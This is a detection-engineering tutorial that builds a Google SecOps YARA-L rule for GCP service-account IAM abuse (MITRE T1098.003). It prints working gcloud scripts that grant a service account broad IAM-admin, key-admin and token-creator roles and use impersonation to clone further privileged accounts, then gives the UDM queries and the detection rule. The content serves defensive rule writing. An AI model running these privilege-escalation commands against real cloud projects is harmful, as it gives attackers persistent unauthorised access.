
Are you looking for a guide on how to ideate new YARA-L rules? If you are a SOC anaylst using SecOps this guide will help you unlock the ideation process for new rules. While we will not delve into YARA-L syntax or rule coding recommendations, we will focus on essential aspects such as attack path discovery, UML search, and testing.
Google SecOps offers numerous pre-configured rules with valuable detection capabilities. However, there are potential gaps in coverage that need to be addressed to safeguard our environment effectively. Our unique security requirements may necessitate the creation of custom YARA-L rules to enhance our defenses and address specific threats.
To identify security gaps not addressed by Google SecOps, multiple approaches can be employed. In this instance, we will concentrate on the clear box pen testing approach.
The gap identification process looks like this:
- Explore the existing detection rules
- Identify exploitable attack paths not covered by the existing rules
- Create an exploit
- Verify that SecOps does not detect the exploit
Through our ongoing proactive approach, we actively seek out and respond to emerging vulnerabilities by developing fresh exploits and detection regulations. The introduction of novel tools opens up new attack vectors, demanding our vigilance and flexible response.
To identify new vectors effectively, we will concentrate on a specific type of vulnerability known as IAM Abuse vulnerabilities. We need to meticulously review all the accessible rules in Google SecOps for this particular vector and identify attacks that are not covered by the curated ruleset.
Some recommendations for vulnerability identification:
- Narrow your scope to a specific vulnerability kind.
- Review all the available rules for your selected vulnerability.
- Research online, leverage the MITRE ATT&CK® framework.
To provide a valid example let’s create a new exploit script, we are going to create a new script based on Account Manipulation: Additional Cloud Roles, Sub-technique T1098.003 — Enterprise | MITRE ATT&CK® technique. This attack vector has been found at the time of writing after a careful analysis of the IAM Abuse detection rules included in Google SecOps, comparing them with the MITRE ATT&CK® framework.
In order to create an exploit for this technique, we must create a script that follows these steps.
- Create a new Service Account
- Grant overly permissive roles to the SA
- Impersonate the SA to create clones
Let’s create an exploit for this vector:
project_id=lucasnogueira-lab-1
evil_user=lucasnogueira@cloudexample.netgcloud config set project $project_id
gcloud services enable serviceusage.googleapis.com
gcloud services enable iam.googleapis.com
gcloud services enable cloudresourcemanager.googleapis.com
gcloud projects add-iam-policy-binding $project_id \
--member=user:$evil_user \
--role='roles/iam.serviceAccountTokenCreator'
gcloud iam service-accounts create evil-service-account \
--description="Evil SA for testing" \
--display-name="Evil SA"
roles=(
'roles/resourcemanager.projectIamAdmin'\
'roles/iam.serviceAccountUser'\
'roles/iam.serviceAccountKeyAdmin'\
'roles/iam.serviceAccountTokenCreator'\
'roles/iam.serviceAccountAdmin'
)
for role in "${roles[@]}"; do
gcloud projects add-iam-policy-binding $project_id \
--member=serviceAccount:evil-service-account@$project_id.iam.gserviceaccount.com \
--role=$role
done
The current configuration grants the service account excessive permissions, allowing it to create new service accounts with similar extensive permissions and generate service account (SA) keys to impersonate the SAs. This clearly seems like an attempt to manipulate the Identity and Access Management (IAM) system, as the SA is not an owner but can still create service accounts for specific actions and impersonate them.
Once you have the exploit ready, proceed to execute it in a cloud shell. If the exploit was successful, it should have not triggered any alerts or detections.
An extension of the previous exploit shows how it can be leveraged by bad actors:
project_id=lucasnogueira-lab-1gcloud iam service-accounts create new-evil-service-account \
--description="New Evil SA for testing" \
--display-name="New Evil SA" \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
roles=(
'roles/resourcemanager.projectIamAdmin'\
'roles/iam.serviceAccountUser'\
'roles/iam.serviceAccountKeyAdmin'\
'roles/iam.serviceAccountTokenCreator'\
'roles/iam.serviceAccountAdmin'
)
for role in "${roles[@]}"; do
gcloud projects add-iam-policy-binding $project_id \
--member=serviceAccount:new-evil-service-account@$project_id.iam.gserviceaccount.com \
--role=$role \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done
We have successfully discovered an unnoticed exploit, enabling us to move forward with the extensive evaluation of security-related incidents.
At this stage, we need to utilize UDM search to determine the types of security events that we can utilize in order to formulate the detection rule.
To identify incidents involving the malicious service account, we can leverage the UDM search field and utilize the following query to retrieve the necessary information.
target.user.email_addresses = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com"
OR principal.user.userid = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com"
By running this query we have found the following events:
USER_RESOURCE_UPDATE_PERMISSIONS
USER_RESOURCE_CREATION
USER_RESOURCE_UPDATE_CONTENT
The output is promising, so we can deep dive in the event USER_RESOURCE_UPDATE_PERMISSIONS
The following UDM search will output all the events where roles/iam.serviceAccountKeyAdmin is granted for the service account.
metadata.event_type = "USER_RESOURCE_UPDATE_PERMISSIONS" AND security_result.action = "ALLOW" AND
principal.user.attribute.roles[0].name = "roles/iam.serviceAccountKeyAdmin" AND
(target.user.email_addresses = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com"
OR principal.user.userid = "evil-service-account@lucasnogueira-lab-1.iam.gserviceaccount.com")
We don’t want to get too many false positives, so we want to focus on the permissions that might allow the service account to replicate itself via impersonation.
This implies that the account will be granted as a minimum, the following roles:
- roles/resourcemanager.projectIamAdmin
- roles/iam.serviceAccountUser
- roles/iam.serviceAccountKeyAdmin
- roles/iam.serviceAccountTokenCreator
- roles/iam.serviceAccountAdmin
Fine-grained roles are not immediately suspicious, but they enable attackers to gain persistence in a system.
Having recognized the fields that pinpoint the security event, we can move forward with the rule development process.
Okay, so based on what we’ve learned, we can start putting our rule together. I’ve already made a rule that checks all the facts in the events tab. Instead of getting into all the technical details, I suggest checking out some better resources for a more in-depth explanation.
Let’s see the information we have compiled in the Step 3:
- The event_type is USER_RESOURCE_UPDATE_PERMISSIONS
- The security_result.action is ALLOW
- The target is a service account
- The roles added to the target are in the list
- roles/resourcemanager.projectIamAdmin
- roles/iam.serviceAccountUser
- roles/iam.serviceAccountKeyAdmin
- roles/iam.serviceAccountTokenCreator
- roles/iam.serviceAccountAdmin
This information produces a unique fingerprint of the exploit, which can be used to identify the attack vector. We can now create a rule that includes all these data points together.
rule lucas_test_sa_iam_abuse {meta:
author = "lucasnogueira"
description = "Detects when a SA is granted excessive granular permissions."
mitre_attack_tactic = "Persistence"
mitre_attack_technique = "Account Manipulation"
mitre_attack_url = "https://attack.mitre.org/techniques/T1098/"
type = "Alert"
data_source = "GCP Audit Logs"
platform = "GCP"
severity = "High"
priority = "High"
events:
$e.target.user.email_addresses = $sa
re.regex($e.target.user.email_addresses, `.*iam\.gserviceaccount\.com$`)
$e.metadata.event_type = "USER_RESOURCE_UPDATE_PERMISSIONS"
$e.security_result.action = "ALLOW"
$e.target.user.attribute.roles.name = "roles/resourcemanager.projectIamAdmin" or
$e.target.user.attribute.roles.name = "roles/iam.serviceAccountKeyAdmin" or
$e.target.user.attribute.roles.name = "roles/iam.serviceAccountUser" or
$e.target.user.attribute.roles.name = "roles/iam.serviceAccountTokenCreator" or
$e.target.user.attribute.roles.name = "roles/iam.serviceAccountAdmin"
match:
$sa over 1h
outcome:
$risk_score = max(50)
$mitre_attack_tactic = "Persistence"
$mitre_attack_technique = "Account Manipulation"
$mitre_attack_technique_id = "T1098"
condition:
#e >= 3
}
To evaluate the rule during its creation, we utilized the rules editor in Google SecOps. As observed in the attached screenshot, the rule effectively detected the exploit we had generated, confirming its functionality.
Although this rule is not flawless, its assistance with detection is a positive step forward. In the next section, we will refine the rule to enhance its effectiveness.
With the exploit and the rule in hand, we can construct a test to evaluate its efficacy. While backtesting on the platform can aid in development, our objective is to conduct live testing to assess the rule’s performance in real-time conditions.
First we must enable the rule so it can start with live detection. To enable the rule go to the RULES DASHBOARD and search for your rule, then go to the three dot menu and enable it as a live rule.
Once the rule is enabled we can proceed to test it in live mode.
During testing, we intend to alter the exploit by crafting alerts that resemble the original exploit but differ in some aspects.
project_id=lucasnogueira-lab-1
gcloud config set project $project_idgcloud iam service-accounts create not-evil-1 \
--description="Not Evil at All SA for testing" \
--display-name="Not Evil at All SA" \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
gcloud iam service-accounts create not-evil-2 \
--description="Not Evil at All SA for testing" \
--display-name="Not Evil at All SA" \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
gcloud iam service-accounts create not-evil-3 \
--description="Not Evil at All SA for testing" \
--display-name="Not Evil at All SA" \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
roles=(
'roles/resourcemanager.projectIamAdmin'\
'roles/iam.serviceAccountKeyAdmin'\
'roles/iam.serviceAccountTokenCreator'\
)
for role in "${roles[@]}"; do
gcloud projects add-iam-policy-binding $project_id \
--member=serviceAccount:not-evil-1@$project_id.iam.gserviceaccount.com \
--role=$role \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done
roles=(
'roles/resourcemanager.projectIamAdmin'\
'roles/iam.serviceAccountKeyAdmin'\
'roles/iam.serviceAccountUser'\
)
for role in "${roles[@]}"; do
gcloud projects add-iam-policy-binding $project_id \
--member=serviceAccount:not-evil-2@$project_id.iam.gserviceaccount.com \
--role=$role \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done
roles=(
'roles/iam.serviceAccountTokenCreator'\
'roles/iam.serviceAccountKeyAdmin'\
'roles/iam.serviceAccountUser'\
)
for role in "${roles[@]}"; do
gcloud projects add-iam-policy-binding $project_id \
--member=serviceAccount:not-evil-3@$project_id.iam.gserviceaccount.com \
--role=$role \
--impersonate-service-account=evil-service-account@$project_id.iam.gserviceaccount.com
done
This script creates three imitations (service accounts) of the malicious service account we’re investigating. Our goal is to see if a security rule can identify suspicious activity even when the specifics (like fingerprints) differ slightly. By introducing these variations, we test the rule’s flexibility and ensure it can effectively detect the unwanted behavior regardless of minor discrepancies.
Let’s put it to the test to see if Google SecOps picks up on these events.
It works! We have been able to detect the exploit even when it has been changed.
In this guide we attempted to show how the ideation process looks like to create new detection rules. This was just an example of an attack path we found that wasn’t really being monitored.
There’s always going to be blind spots and we must figure out those blind spots all the time. I hope this guide helps everyone on learning the process of rule creation, so you can build a more secure and robust environment.
Source Credit: https://medium.com/google-cloud/guide-ideating-custom-yara-l-detection-rules-in-google-secops-c15e2645a61a?source=rss—-e52cf94d98af—4